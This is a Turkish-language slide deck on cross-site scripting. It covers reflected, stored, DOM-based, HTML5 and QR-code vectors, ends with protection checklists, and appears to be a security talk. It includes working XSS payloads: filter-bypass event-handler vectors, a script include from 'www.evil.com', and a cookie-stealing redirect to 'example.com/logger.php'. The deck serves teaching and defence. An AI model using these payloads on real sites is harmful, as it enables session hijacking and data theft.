javascript injections
DESCRIPTION
Web uygulama güvenliği ve Javascript Injection MethodlarıTRANSCRIPT
![Page 1: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/1.jpg)
JavaScript Injections
● Bilgi Güvenliği Araştırmacısı @SignalSec● Pentester● Yazılım geliştirici● Open-Source sever.
@evrnyalcin
www.signalsec.com/blog
![Page 2: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/2.jpg)
Index
0x01 Xss nedir?
0x02 Reflected, Stored, Dom XSS
0x03 Html5 Xss
0x04 Qrcode Xss
0x05 Motivasyon
0x06 Korunma Yöntemleri
![Page 3: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/3.jpg)
Xss(cross-site scripting)
● Çapraz site betik saldırısı● Xss, en yaygın web saldırılarından birisidir.
(Top10)● Html, Css, JavaScript, Xml, DOM, Cookie, URI,
VBscript kullanılarak yapılır.
![Page 4: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/4.jpg)
Xss Saldırı Çeşitleri
● Reflected● Stored● DOM
![Page 5: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/5.jpg)
Tarayıcı Bileşenleri
![Page 6: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/6.jpg)
Reflected Xss
![Page 7: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/7.jpg)
Değişen ne?
URL :
Gonder.php?ad=justin&soyad=biber
Kaynak kodu :
$_GET['ad']
$_GET['soyad']
![Page 8: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/8.jpg)
Yanıt
Merhaba $_GET['ad'] $_GET['soyad']
![Page 9: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/9.jpg)
Reflected Xss
Gonder.php?ad=justin<Saldırı vektörü buraya gelecek>&soyad=biber
● Saldırı Vektörü : <script>alert(1);</script>
![Page 10: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/10.jpg)
Alert!
![Page 11: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/11.jpg)
Stored Xss
![Page 12: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/12.jpg)
Stored Xss
Method : POST
Gonder.php?ad=justin&soyad=biber
Kayıtlı Kullanıcılar:
![Page 13: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/13.jpg)
Stored Xss
Gonder.php?ad=justin<Saldırı vektörü buraya gelecek>&soyad=biber
● Saldırı Vektörü : <script>alert(1);</script>
![Page 14: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/14.jpg)
Alert!
![Page 15: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/15.jpg)
DOM nedir?
● DOM(Document Object Model) – Belge Nesne Yapısı
● DOM sayfa içindeki herhangi bir nesnenin özelliğine müdahele edebilmemize, nesne özelliklerini değiştirebilmemize olanak sağlar
![Page 16: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/16.jpg)
DOM XSS
● DOM nesnelerine müdahale edilmesiyle ortaya çıkan bir açıktır.
● DOM-XSS, client-side bir açıktır.● URL parametreleri, XMLHttpRequest , HTTP
headers vb gibi...● Reflected, Stored kadar tehlikeli bir açıktır.
![Page 17: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/17.jpg)
DOM XSS Source&Sinks
● Source : Saldırgan tarafından etkilenen DOM özellikleri
● Sink: DOM özellikleri, Javascript fonksiyonları vb gibi alanlar istemci taraflı kod çalıştırabilirler.
![Page 18: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/18.jpg)
Source
● document.URL● document.URLUencoded● document.location(.pathname|.href|.search|.ha
sh)● window.location(.pathname|.href|.search|.hash
)
![Page 19: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/19.jpg)
Source
● Document.cookie● SessionStorage● LocalStorage● Web SQL Database● Indexed DB
![Page 20: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/20.jpg)
Source
● Window.name● Document.referer● history(Html5)
![Page 21: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/21.jpg)
Sinks
InnerHTML, outerHTML, document.write● Eval, execScript, function, setTimeout,
setInterval, script.src, iframe.src, location(replace|assign)
![Page 22: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/22.jpg)
DOM-based
● www.ornek.com/#key=value● www.ornek.com/#key=value<script src=”
http://www.evil.com”></script>
![Page 23: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/23.jpg)
Dom-Xss örnek
<script type="text/javascript">
var param = location.hash.split("#")[1];
document.write("Merhaba " + param + "!");
</script>
![Page 24: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/24.jpg)
Dom-Xss örnek
● ornek.html#<script>alert(1)</script>
IE 6, 7, 8, 9
Chrome 15 (XSS Filter Block)
Firefox 3, 4, 5, 6, 7
![Page 25: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/25.jpg)
Jquery Güvenli mi?
● Javascript Güvenliği = Jquery Güvenliği● Jquery = Sink (bugs.jquery.com)
![Page 26: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/26.jpg)
Bankalar Jquery Kullanırsa
Teori : ● Dom Xss açığı
● Top10 bankalar:
jQuery 1.3.2.min.js, jQuery 1.2.3 vs
● Pratik?
![Page 27: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/27.jpg)
Jquery 1.6.1
Saldırı Vektörü : http://ornek.com/#<img src=/ onerror=alert(1)>
![Page 28: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/28.jpg)
Html5
● Html5 > Html4● Yeni etiketler, özellikler● Yeni API'ler● Flash,Silverlight,java gibi eklentilere daha az
ihtiyaç duyacağız.● Clienr-side storage, drag-drop, web sockets● Firefox, Chrome, Safari ve Opera destekliyor.
![Page 29: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/29.jpg)
Bypass filters
● <script>, <img> gibi tagları blokladım!
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
=> http://html5sec.org/
![Page 30: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/30.jpg)
Bypass Filters
● <, > gibi tagları blokladım!
<form id onforminput=alert(1)><input></form>
<button form=test onformchange=alert(2)>
![Page 31: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/31.jpg)
Local-Storage
<script>
alert(localStorage.getItem('SessionID'));
</script>
![Page 32: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/32.jpg)
Qrcode(Karekod)
● QRCode(Quick Response) adını kelimelerinin baş harflerinden alır.
● Son yıllarda, Reklam panolarında, Kartvizitlerde, mobil ödemelerde vs kullanılıyor
Barkod içeriği kullanıcıyı ,● internet adresine, e-posta adresine, telefon
numarasına, iletişim bilgilerinie sms/mms, coğrafi konum bilgisine yönlendirebilir.
![Page 33: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/33.jpg)
En büyük saldırı vektörü :)
![Page 34: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/34.jpg)
EvilQR
Mobil cihazlar, hackerler için altın madenidir.● Kişisel bilgilerin çalınması● Konum bilgisi çalınması● 3G, GPRS, Wi-Fi, Blue-Tooth vs. Uzaktan kontrol
ile aktif edilmesi.● Kredi kartı bilgileri● Sosyal hesapların deface edilmesi(Twitter,
Facebook vs)
![Page 35: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/35.jpg)
EvilQR
2 durum oluşturduk:● Javascript kodu çalıştır.● Kullanıcıyı zararlı içeriğe yönlendir.
![Page 36: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/36.jpg)
EvilQR saldırı vektörleri
![Page 37: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/37.jpg)
EvilQR analiz
![Page 38: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/38.jpg)
Decode
![Page 39: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/39.jpg)
QR okuyucu test
![Page 40: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/40.jpg)
Güvenlik Önerileri
● Bilmediğiniz kaynaklarda QR-code kullanmayın● QR okuyucunuzda güvenlik açığı olup
olmadığına emin olun
![Page 41: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/41.jpg)
Motivasyon
Saldırı vektörü : <script>alert(document.location)</script>
![Page 42: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/42.jpg)
Motivasyon
● Xss açığı
vuln.php?id=<script>document.location="http://example.com/logger.php?cookie="+document.cookie;</script>
● JavaScript ile klavye hareketlerini takip et(onkeypress event)
● Html2canvas ile ekran görüntülerini çal
![Page 43: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/43.jpg)
Motivasyon
● Samy worm (myspace) : Myspace'in çökmesine sebep olmuştur
● Yahoo Yamanner Worm : Web-mail sistemine bulaşmış ve spam yapmıştır.
● Orkut Worm : 300.000-600.000 kişiye bulaştığı söyleniyor.
![Page 44: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/44.jpg)
Motivasyon
● Tumblr ağı şu an 65 milyon blog, 27,6 milyar post barındırıyor
● Tumblr Stored Xss
Saldırı vektörü :
tester"><img src='x' onerror="alert(document.cookie)" />
![Page 45: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/45.jpg)
Motivasyon
www.xssed.com
![Page 47: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/47.jpg)
Motivasyon
Dominator(Dom Xss Scanner)
![Page 48: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/48.jpg)
Motivasyon
XSS Challenge
![Page 49: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/49.jpg)
Motivasyon
● CIfrex Security Research Tool ● Ücretsiz● Php tabanlı ● “Apache2 Undefined Charset UTF-7 XSS
Vulnerability” ve nicesi● Cxsecurity.com
![Page 50: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/50.jpg)
Motivasyon
Herşeyin bir bedeli var :) Google, Microsoft, Facebook, Twitter, Adobe, Ebay, Paypal vs
![Page 51: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/51.jpg)
Zafiyeti ifşa etmek
● Responsible Disclosure:
1- Üretici ile temasa geçilir.
2- POC (proof-of-concept code) paylaşılır.
3- Anlaşırlar.
4- exploit-db.com gibi bir sitede yayınlanır.
![Page 52: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/52.jpg)
Zafiyeti ifşa etmek -2
● Limited Disclosure:
1- Üretici ile temasa geçilir.
2- POC, herhangi bir bilgi verilmez.
![Page 53: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/53.jpg)
Zafiyet ifşa etmek -3
● No Disclosure:
1- Deface
![Page 54: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/54.jpg)
Korunma
● Html taglarını kapattınız mı?● Kullanıcı girdilerinde ' “ \ karakterlerini
denediniz mi?● Url link, attr vs değerlerinde farklı içerikler
denediniz mi?● Karakter kodlamasına dikkat ettiniz mi?● Response-header için Content-Type
tanımladınız mı?
![Page 55: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/55.jpg)
Korunma
● HttpOnly kullanıyor musunuz?● Cache-Control header, http üzerindeki kullanıcılar için ne durumda?● 3. parti javascriptler içeri aktarılıyor mu?● Session cookie korunuyor mu?● Http header'ı kullanıcılar değiştirilebiliyor mu?● Kullanıcı dosya yükleyebiliyor mu?● Kullanıcı görsel vs yükleyebiliyor mu? Yüklüyorsa dosya içeriğini ve
aynı domainde olup olmadığını kontrol ediyor musunuz?● API erişimi sağlıyormusunuz? Evetse, aynı domainde mi ve cross-
domain kısıtlaması var mı?
![Page 56: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/56.jpg)
Sonuç?
● Bütün kullanıcı girdileri tehlikelidir.● İnsan faktörü
![Page 57: Javascript Injections](https://reader034.vdocuments.mx/reader034/viewer/2022042613/546c4497af795962298b4f42/html5/thumbnails/57.jpg)
TEŞEKKÜRLER @evrnyalcin | @xsuperbug